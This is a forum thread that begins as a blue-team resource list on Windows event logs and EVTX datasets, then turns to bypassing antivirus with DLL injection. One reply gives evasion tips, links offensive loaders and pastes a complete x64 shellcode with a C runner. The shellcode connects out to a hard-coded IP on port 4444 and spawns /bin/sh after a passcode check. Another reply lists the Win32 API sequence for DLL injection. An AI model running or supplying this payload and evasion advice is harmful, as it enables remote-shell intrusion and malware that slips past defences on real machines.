Windows
Casual
146

Windows events-log and dataset for audit security






  07-Aug-2022 16:31:20




I'm researching about the windows event log. I'm learning now, here is the summary, for those of you who want to play as blue team, forensic, threat hunting, SIEM 

What is Windows event log? 

Windows event log is an in-depth record of events related to the system, security, and application stored on a Windows operating system.  Event logs can be used to track system and some application issues and forecast future problems. 

Audit security : https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/view-the-security-event-log 

Export log (evtx)

https://www.veeam.com/kb1873 

https://www.ibm.com/support/pages/exporting-windows-event-logs-event-viewer 

[+] Download : Windows security event log and audit 

https://www.microsoft.com/en-us/download/confirmation.aspx?id=50034 

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/ 

Learn More

https://www.solarwinds.com/resources/it-glossary/windows-event-log  

https://www.esecurityplanet.com/threats/hackers-exploit-windows-event-logs/  

https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/  

https://medium.com/@lucideus/introduction-to-event-log-analysis-part-1-windows-forensics-manual-2018-b936a1a35d8a 

https://blueteamblog.com/threat-hunting-with-windows-security-event-logs 

Tools and Dataset 

https://github.com/Jieyab89/Grafiki  

https://github.com/Jieyab89/evtx  

https://github.com/Jieyab89/EVTX-to-MITRE-Attack 

Result dataset 



DISCUSSION

If you have more knowlegde you can comment on this post and adding more resources for my path learn. Thanks all, CMIW




Reply


07-Aug-2022 21:03:16



How you parse to json there is api?


Reply


07-Aug-2022 22:26:38



I use tool evtx parser available on Github, or you can made using Pyhton using lib evtx https://pypi.org/project/evtx2es/ i dont much know about Python 


Reply


07-Aug-2022 22:50:15



Thanks mate


Reply




07-Aug-2022 21:10:30

Will you make microservice own your api?




Reply


07-Aug-2022 22:27:22



Hmmm i think, but private this dataset i will make for Logen and my learn stuf


Reply


07-Aug-2022 23:24:18



What is Logen?


Reply


10-Aug-2022 15:40:49



Logen is web monitoring, made by Seccodeid Developer

more : https://seccodeid.com/guides 


Reply


10-Aug-2022 21:32:50



Not bad, lol


Reply

Gw pengguna windows cuman baru ngeh ada evtx buat apaan kwkwk btw lu main ke blue tim?



Reply


07-Aug-2022 22:27:58



Sedikit, masih kurang banyak saya. Ngulik dikit - dikit tentang blue tim


Reply


30-Aug-2022 13:44:21



Udah sampe mana aja lu?


Reply


31-Aug-2022 17:10:43



Baru dikit lagi iseng iseng baca - baca tentang SIEM sama mencoba wazuh, otx cuman rada berat buat server kwkw


Reply




07-Aug-2022 21:56:11

Whops it related about .dll injection, today i was learn about bypassing malwware with AV i have problem do injection




Reply


07-Aug-2022 22:42:26



You can check my reply, scroll it :D


Reply


07-Aug-2022 23:27:53



Injection .dll You need to understand the target machine, the programming language doing the injection you need to change or add. If you study zero day like "follina" you need to learn a lot of things



Reply


07-Aug-2022 23:42:58



You need crafting loader, I haven't really explored it yet still learn 


Reply

Yes, whoa good it for you. But i dont know more about .dll injection. I know only basic and have not practiced in doing injection .dll injection like this I find it difficult and I don't understand much about registry, kernel, machine code, syscall, stack, shellcode and others, it's still a long way from understanding and in detail


But I once read an article, you can bypass by changing a value from the program so that it is not detected by AV (dynamic analysis and static analysis), such as hashes, bytes and others, and as I remember you can do the injection with base encode 64 in doing injections or using api hooks, making my shellcode not practice this and don't really understand the details


.dll injection is usually often found in crack games, cheats to mitigate you can do an audit, make whitelists of the datasets you find, don't forget there is still a firewall that you must penetrate


Learn more :

-https://attack.mitre.org/techniques/T1055/001/#:~:text=DLL injection is a method,by invoking a new thread.

- https://www.cynet.com/attack-techniques-hands-on/dlls-and-ways-they-can-hurt-us/

- https://resources.infosecinstitute.com/topic/red-team-tutorial-a-walkthrough-on-memory-injection-techniques/

- https://www.apriorit.com/dev-blog/679-windows-dll-injection-for-api-hooks


.dll injection


- https://github.com/AYIDouble/Simple-DLL-Injection

- https://github.com/screetsec/TheFatRat


Shellcode


Code snipsheet

/*
; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 1322
; 138 bytes
global _start
section .text
_start:

   ;socket syscall
   push byte 0x29 ; 41 socket 
   pop rax    
   push byte 0x2 ; AF_INET
   pop rdi  
   push byte 0x1 ; SOCK_STREAM
   pop rsi    
   cdq ;rdx = 0 - ANY
   syscall
   
   xchg rdi, rax ; save socket descriptor
   
   mov dword [rsp-4], 0x0901a8c0 ; ip
   mov word [rsp-6], 0x5c11      ; port 4444
   mov byte [rsp-8], 0x02
   sub rsp, 8
   
   push byte 0x2a ; connect
   pop rax
   mov rsi, rsp   ; pointer    
   push byte 0x10 ; len
   pop rdx
   syscall

   push byte 0x3; counter 
   pop rsi

dup2_loop:
   dec rsi
   push byte 0x21
   pop rax
   syscall
   jnz dup2_loop ; jump if not 0

   ;read buffer
   mov rdi, rax ; socket
   ;xor rax, rax
   cdq
   mov byte [rsp-1], al ;0 read
   sub rsp, 1
         
   push rdx 
   lea rsi, [rsp-0x10] ; 16 bytes from buf
   add dl, 0x10        ; size_t count
   syscall
   
   ;test passcode
   mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
   push rdi                    ; save the socket
   lea rdi, [rsi]              ; load string from address
   scasq                       ; compare
   jz accepted_passwd          ; jump if equal
   
   ;exit if different :P
   push byte 0x3c 
   pop rax
   syscall

accepted_passwd:
   
   ;execve
   pop rdi; socket
   xor rax, rax
   mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
   push rbx
   mov rdi, rsp
   push rax
   mov rdx, rsp
   push rdi 
   mov rsi, rsp
   add al, 0x3b
   syscall
*/

#include <stdio.h>
#include <string.h>

// 138 bytes 
unsigned char code[] =\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05"
"\x48\x97\xc7\x44\x24\xfc"
"\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa"
"\x11\x5c" //port big endiant
"\xc6\x44\x24\xf8\x02\x48\x83"
"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05"
"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83"
"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f"
"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57"
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05"
"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48"
"\x89\xe6\x04\x3b\x0f\x05";

main()
{
   printf("Shellcode Length: %d\n", (int)strlen(code));
   int (*ret)() = (int(*)())code;
   ret();
}





- https://dhavalkapil.com/blogs/Shellcode-Injection/

- http://www.shell-storm.org/shellcode/

- https://github.com/icyguider/Shhhloader


Sorry, I can't be of much help, CMIW




Reply


07-Aug-2022 22:52:15



Not bad, this is more than enough. At this stage I also find it difficult to develop what I learned maybe I should try harder


Reply


07-Aug-2022 22:58:48



Yes! Me too 


Reply


07-Aug-2022 22:58:26



This is example shellcode. No for your case


Reply


07-Aug-2022 23:40:14



I I will add something important   


Injector Code

In our code, I use some Win32 API functions to do the injection. And I think, in general, articles about DLL Injection on the internet use the same code for the basic injection category.


OpenProcess()
Get the handle of the target process.


VirtualAllocEx()
Allocate memory in the target process's memory region. Data such as function names, parameters, and so on that will be used by the injected code must reside in the target process's memory location previously allocated with this function.


WriteProcessMemory()
Writes data to memory that has been allocated in the target process memory region.


CreateRemoteThread()
Runs a new thread in the target process. This will execute the injected DLL.


GetProcAddress()
Get the address of a function in a DLL. This will be used to retrieve the address of the LoadLibrary() function in kernel32.dll


WaitForSingleObject()
Waits for execution to complete, including the INFINITE parameter.

CloseHandle()
Closes the process handle obtained from OpenProcess.


https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/Shellcode&ThreatID=-2147406041 

https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/what-determines-when-a-driver-is-loaded 

https://docs.microsoft.com/en-us/windows/win32/apiindex/api-set-loader-operation 

https://github.com/snovvcrash/DInjector 


Reply


08-Aug-2022 21:32:44



Thank you 


Reply


Login for comment and discussion.
Login Here
Sponsored

Oppss... No sponsors yet

Popular Posts
Complete Basic Course in Kali...
Djie sam soe Djie sam soe
Linux
10405
2
Top

Gps Tracker Seccodeid Free Too...
Djie sam soe Djie sam soe
General
7260
167
Top

Free Proxy List
Sandidi Sandidi
Networking
3073
3
Top

Mass Reverse IP Unlimited
ImamWawe ImamWawe
Tools Hacking
2378
12
Top

Report McAfee Antivirus Hurrri...
Indrasp Indrasp
Windows
1710
93
Top

Related Post

Youtube Video

Subscribe